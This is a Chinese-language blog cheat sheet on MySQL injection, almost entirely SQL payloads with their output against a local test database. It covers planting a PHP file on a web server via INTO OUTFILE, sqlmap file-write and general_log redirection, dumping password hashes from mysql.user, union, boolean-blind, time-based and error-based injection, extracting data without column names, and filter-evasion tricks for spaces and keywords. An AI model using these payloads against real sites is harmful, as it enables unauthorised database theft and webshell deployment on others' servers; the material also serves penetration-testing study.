Hzktester`s Blog
0%

MYSQL注入总结

发表于 分类于 阅读次数:
本文字数: 13k 阅读时长 ≈ 11 分钟

写shell命令总结

sql语句写入shell:

1
select '<?php phpinfo(); ?>' into outfile '/var/www/html/info.php';

sqlmap写入shell:

1
sqlmap -u "http://x.x.x.x/?id=x" --file-write="/Users/guang/Desktop/shell.php" --file-dest="/var/www/html/test/shell.php"

日志文件写入shell:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# 更改日志文件位置
set global general_log = "ON";
set global general_log_file='/var/www/html/info.php';

# 查看当前配置
mysql> SHOW VARIABLES LIKE 'general%';
+------------------+-----------------------------+
| Variable_name    | Value                       |
+------------------+-----------------------------+
| general_log      | ON                          |
| general_log_file | /var/www/html/info.php |
+------------------+-----------------------------+

# 往日志里面写入 payload
select '<?php phpinfo();?>';

hash密码获取

MySQL <= 5.6 版本

1
2
3
4
5
6
7
8
9
mysql> select host, user, password from mysql.user;
+-----------+------+-------------------------------------------+
| host      | user | password                                  |
+-----------+------+-------------------------------------------+
| localhost | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
| 127.0.0.1 | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
| ::1       | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
| %         | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
+-----------+------+-------------------------------------------+

MySQL >= 5.7 版本

1
2
3
4
5
6
7
8
mysql > select host,user,authentication_string from mysql.user;
+-----------+---------------+-------------------------------------------+
| host      | user          | authentication_string                     |
+-----------+---------------+-------------------------------------------+
| localhost | root          | *8232A1298A49F710DBEE0B330C42EEC825D4190A |
| localhost | mysql.session | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |
| localhost | mysql.sys     | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |
+-----------+---------------+-------------------------------------------+

mysql常用技巧

order by:用于判断字段数量

1
2
3
4
5
6
7
8
9
10
11
mysql> select id,username from user order by 1;
+----+-----------+
| id | username  |
+----+-----------+
|  1 | testdemo  |
|  2 | testdemo2 |
|  3 | testdemo3 |
+----+-----------+
3 rows in set (0.00 sec)
mysql> select id,username from user order by 3;
ERROR 1054 (42S22): Unknown column '3' in 'order clause'

limit:用户限制查询结果行数

1
2
3
4
5
6
7
mysql> select id,username from user limit 0,1;
+----+----------+
| id | username |
+----+----------+
|  1 | testdemo |
+----+----------+
1 row in set (0.00 sec)

不使用逗号的limit

1
2
3
4
5
6
7
mysql> select id,username from user limit 1 offset 0;
+----+----------+
| id | username |
+----+----------+
|  1 | testdemo |
+----+----------+
1 row in set (0.00 sec)

mysql中的注释

#:单行注释

1
2
3
4
5
6
7
8
9
mysql> select id,username from user;#select user();
+----+-----------+
| id | username  |
+----+-----------+
|  1 | testdemo  |
|  2 | testdemo2 |
|  3 | testdemo3 |
+----+-----------+
3 rows in set (0.00 sec)

/**/: 单行注释

1
2
3
4
5
6
7
8
9
mysql> select id,username from user;/*select user()*/;
+----+-----------+
| id | username  |
+----+-----------+
|  1 | testdemo  |
|  2 | testdemo2 |
|  3 | testdemo3 |
+----+-----------+
3 rows in set (0.00 sec)

–+(空格):单行注释

1
2
3
4
5
6
7
8
9
mysql> select id,username from user;-- select user();
+----+-----------+
| id | username  |
+----+-----------+
|  1 | testdemo  |
|  2 | testdemo2 |
|  3 | testdemo3 |
+----+-----------+
3 rows in set (0.00 sec)

/!/:内敛注释

1
2
3
4
5
6
7
8
9
mysql> /*!select*/ id,username from user;
+----+-----------+
| id | username  |
+----+-----------+
|  1 | testdemo  |
|  2 | testdemo2 |
|  3 | testdemo3 |
+----+-----------+
3 rows in set (0.00 sec)

/!12345/:内敛注释

1
2
3
4
5
6
7
8
9
mysql> /*!12345select*/ id,username from user;
+----+-----------+
| id | username  |
+----+-----------+
|  1 | testdemo  |
|  2 | testdemo2 |
|  3 | testdemo3 |
+----+-----------+
3 rows in set (0.00 sec)

mysql中的比较语句:都支持16进制

in:

1
2
3
4
5
6
7
mysql> select 1 in (1);
+----------+
| 1 in (1) |
+----------+
|        1 |
+----------+
1 row in set (0.00 sec)

like:

1
2
3
4
5
6
7
mysql> select 1234 like '%23%'; # 模糊匹配
+------------------+
| 1234 like '%23%' |
+------------------+
|                1 |
+------------------+
1 row in set (0.00 sec)

regexp:

1
2
3
4
5
6
7
mysql> select '123456' regexp '[0-9]+'; # 正则匹配
+--------------------------+
| '123456' regexp '[0-9]+' |
+--------------------------+
|                        1 |
+--------------------------+
1 row in set (0.00 sec)

rlike:

1
2
3
4
5
6
7
mysql> select '123456' rlike '[0-9]+'; # 正则匹配
+-------------------------+
| '123456' rlike '[0-9]+' |
+-------------------------+
|                       1 |
+-------------------------+
1 row in set (0.00 sec)

mysql查询语句:

查询数据库名:

1
2
3
4
5
6
7
8
9
10
11
12
mysql> select schema_name from information_schema.schemata;
+--------------------+
| schema_name        |
+--------------------+
| information_schema |
| empirecms          |
| met                |
| mysql              |
| performance_schema |
| test               |
+--------------------+
6 rows in set (0.01 sec)

查询库中的表名:

1
2
3
4
5
6
7
mysql> select table_name from information_schema.tables where table_schema='test';
+------------+
| table_name |
+------------+
| user       |
+------------+
1 row in set (0.00 sec)

查询表中的字段名:

1
2
3
4
5
6
7
8
9
10
11
12
mysql> select column_name from information_schema.columns where table_name='user';
+------------------------+
| column_name            |
+------------------------+
| Host                   |
| User                   |
| Password               |
| Select_priv            |
| Insert_priv            |
| ...........            |
+------------------------+
45 rows in set (0.02 sec)

mysql中的条件语句

IF(expr1,expr2,expr3):

如果expr1TRUE则返回值为expr2,否则返回值则为expr3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
mysql> select if(1=1,'yes','no');
+--------------------+
| if(1=1,'yes','no') |
+--------------------+
| yes                |
+--------------------+
1 row in set (0.00 sec)

mysql> select if(1=2,'yes','no');
+--------------------+
| if(1=2,'yes','no') |
+--------------------+
| no                 |
+--------------------+
1 row in set (0.00 sec)

IFNULL(expr1,expr2):

如果expr1不为NULL,则返回值为expr1,否则其返回值为expr2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
mysql> select ifnull(1,'testdemo');
+----------------------+
| ifnull(1,'testdemo') |
+----------------------+
| 1                    |
+----------------------+
1 row in set (0.00 sec)

mysql> select ifnull(1/0,'testdemo');
+------------------------+
| ifnull(1/0,'testdemo') |
+------------------------+
| testdemo               |
+------------------------+
1 row in set (0.00 sec)

case when expr1 then expr2 else expr3 end:

如果expr1TRUE则返回值为expr2,否则返回值则为expr3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
mysql> select case when ascii(substr(database(),1,1))>1 then 1 else 2 end;
+-------------------------------------------------------------+
| case when ascii(substr(database(),1,1))>1 then 1 else 2 end |
+-------------------------------------------------------------+
|                                                           1 |
+-------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> select case when ascii(substr(database(),1,1))>128 then 1 else 2 end;
+---------------------------------------------------------------+
| case when ascii(substr(database(),1,1))>128 then 1 else 2 end |
+---------------------------------------------------------------+
|                                                             2 |
+---------------------------------------------------------------+
1 row in set (0.00 sec)

mysql中的联合注入union

union select:

1
2
3
4
5
6
7
8
9
10
mysql> select * from user union select 1,2,3;
+----+-----------+----------------------------------+
| id | username  | password                         |
+----+-----------+----------------------------------+
|  1 | testdemo  | e10adc3949ba59abbe56e057f20f883e |
|  2 | testdemo2 | e10adc3949ba59abbe56e057f20f883e |
|  3 | testdemo3 | e10adc3949ba59abbe56e057f20f883e |
|  1 | 2         | 3                                |
+----+-----------+----------------------------------+
4 rows in set (0.00 sec)

union all select:

1
2
3
4
5
6
7
8
9
10
mysql> select * from user union all select 1,2,3;
+----+-----------+----------------------------------+
| id | username  | password                         |
+----+-----------+----------------------------------+
|  1 | testdemo  | e10adc3949ba59abbe56e057f20f883e |
|  2 | testdemo2 | e10adc3949ba59abbe56e057f20f883e |
|  3 | testdemo3 | e10adc3949ba59abbe56e057f20f883e |
|  1 | 2         | 3                                |
+----+-----------+----------------------------------+
4 rows in set (0.00 sec)

盲注

通过返回结果来判断字符ascii码,最终能获取database()的结果

1
2
3
4
5
6
7
8
9
10
mysql> select username,password from user where id=1 and ascii(substr((select database()),1,1))>65;
+----------+----------------------------------+
| username | password                         |
+----------+----------------------------------+
| testdemo | e10adc3949ba59abbe56e057f20f883e |
+----------+----------------------------------+
1 row in set (0.00 sec)

mysql> select username,password from user where id=1 and ascii(substr((select database()),1,1))>128;
Empty set (0.00 sec)

延迟注入

通过返回的结果的时间来判断字符ascii码,最终能获取database()的结果

IF():

1
2
3
4
5
6
7
8
9
10
mysql> select username from user where id=1 and if(ascii(substr((select database()),1,1))>1,1,sleep(1));
+----------+
| username |
+----------+
| testdemo |
+----------+
1 row in set (0.00 sec)

mysql> select username from user where id=1 and if(ascii(substr((select database()),1,1))>128,1,sleep(1));
Empty set (1.00 sec)

IFNULL():

1
2
3
4
5
6
7
8
9
10
mysql> select username from user where id=1 and ifnull(1/(ascii(substr((select database()),1,1))>1),sleep(1));
+----------+
| username |
+----------+
| testdemo |
+----------+
1 row in set (0.00 sec)

mysql> select username from user where id=1 and ifnull(1/(ascii(substr((select database()),1,1))>128),sleep(1));
Empty set (1.00 sec)

case when expr1 then expr2 else expr3 end:

1
2
3
4
5
6
7
8
9
10
mysql> select username from user where id=1 and (select case when ascii(substr((select database()),1,1))>1 then 1 else sleep(1) end);
+----------+
| username |
+----------+
| testdemo |
+----------+
1 row in set (0.00 sec)

mysql> select username from user where id=1 and (select case when ascii(substr((select database()),1,1))>128 then 1 else sleep(1) end);
Empty set (1.00 sec)

报错注入

updatexml():

1
2
mysql> select username from user where 1=1 and updatexml(1,concat(0x7e,(select database())),1);
ERROR 1105 (HY000): XPATH syntax error: '~test'

extractvalue():

1
2
mysql> select username from user where 1=1 and extractvalue(1,concat(0x7e,(select database())));
ERROR 1105 (HY000): XPATH syntax error: '~test'

floor():

1
2
mysql> select username from user where 1=1 and (select 1 from (select count(*),concat((select database()),floor(rand(0)*2))x from mysql.user group by x)a);
ERROR 1062 (23000): Duplicate entry 'test1' for key 'group_key'

name_const():比较鸡肋

1
2
mysql> select username from user where 1=1 and (select * from (select name_const(version(),1),name_const(version(),1))a);
ERROR 1060 (42S21): Duplicate column name '5.5.53'

exp():对于版本限制比较大

1
2
mysql> select exp(~(select * from(select user())x));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'

在不知道列名的情况下注入

正常查询。字段名为id,username,password

1
2
3
4
5
6
7
8
9
mysql> select * from user;
+----+-----------+----------------------------------+
| id | username  | password                         |
+----+-----------+----------------------------------+
|  1 | testdemo  | e10adc3949ba59abbe56e057f20f883e |
|  2 | testdemo2 | e10adc3949ba59abbe56e057f20f883e |
|  3 | testdemo3 | e10adc3949ba59abbe56e057f20f883e |
+----+-----------+----------------------------------+
3 rows in set (0.00 sec)

联合查询,字段名变为1,2,3

1
2
3
4
5
6
7
8
9
10
mysql> select 1,2,3 union select * from user;
+---+-----------+----------------------------------+
| 1 | 2         | 3                                |
+---+-----------+----------------------------------+
| 1 | 2         | 3                                |
| 1 | testdemo  | e10adc3949ba59abbe56e057f20f883e |
| 2 | testdemo2 | e10adc3949ba59abbe56e057f20f883e |
| 3 | testdemo3 | e10adc3949ba59abbe56e057f20f883e |
+---+-----------+----------------------------------+
4 rows in set (0.00 sec)

畸形查询:

姿势1:

1
2
3
4
5
6
7
8
9
mysql> select `1`,`2`,`3` from (select 1,2,3 union select * from user)x limit 1,3;
+---+-----------+----------------------------------+
| 1 | 2         | 3                                |
+---+-----------+----------------------------------+
| 1 | testdemo  | e10adc3949ba59abbe56e057f20f883e |
| 2 | testdemo2 | e10adc3949ba59abbe56e057f20f883e |
| 3 | testdemo3 | e10adc3949ba59abbe56e057f20f883e |
+---+-----------+----------------------------------+
3 rows in set (0.00 sec)

姿势2:

1
2
3
4
5
6
7
8
9
10
mysql> select * from (select 1)a,(select 2)b,(select 3)c union select * from user;
+---+-----------+----------------------------------+
| 1 | 2         | 3                                |
+---+-----------+----------------------------------+
| 1 | 2         | 3                                |
| 1 | testdemo  | e10adc3949ba59abbe56e057f20f883e |
| 2 | testdemo2 | e10adc3949ba59abbe56e057f20f883e |
| 3 | testdemo3 | e10adc3949ba59abbe56e057f20f883e |
+---+-----------+----------------------------------+
4 rows in set (0.00 sec)

姿势3:

1
2
3
4
5
6
7
8
9
mysql> select `1`,`2`,`3` from (select * from (select 1)a,(select 2)b,(select 3)c union select * from user)x limit 1,3;
+---+-----------+----------------------------------+
| 1 | 2         | 3                                |
+---+-----------+----------------------------------+
| 1 | testdemo  | e10adc3949ba59abbe56e057f20f883e |
| 2 | testdemo2 | e10adc3949ba59abbe56e057f20f883e |
| 3 | testdemo3 | e10adc3949ba59abbe56e057f20f883e |
+---+-----------+----------------------------------+
3 rows in set (0.00 sec)

姿势4:

1
2
3
4
5
6
7
8
9
mysql> select * from (select * from (select 1)a join (select 2)b join (select 3)c union select * from user)x limit 3 offset 1;
+---+-----------+----------------------------------+
| 1 | 2         | 3                                |
+---+-----------+----------------------------------+
| 1 | testdemo  | e10adc3949ba59abbe56e057f20f883e |
| 2 | testdemo2 | e10adc3949ba59abbe56e057f20f883e |
| 3 | testdemo3 | e10adc3949ba59abbe56e057f20f883e |
+---+-----------+----------------------------------+
3 rows in set (0.00 sec)

空格复仇技巧

1
2
3
4
5
6
7
8
9
10
select(username)from(user);
select`username`from`user`;
/*!select*/username/**/from/*!12345user*/;
select{x username}from{x user};
select version/**/();
select version%0A();
select `version`();
select user from mysql/**/./**/user;
select user from `mysql`.`user`;
select user from mysql%0A.%0Auser;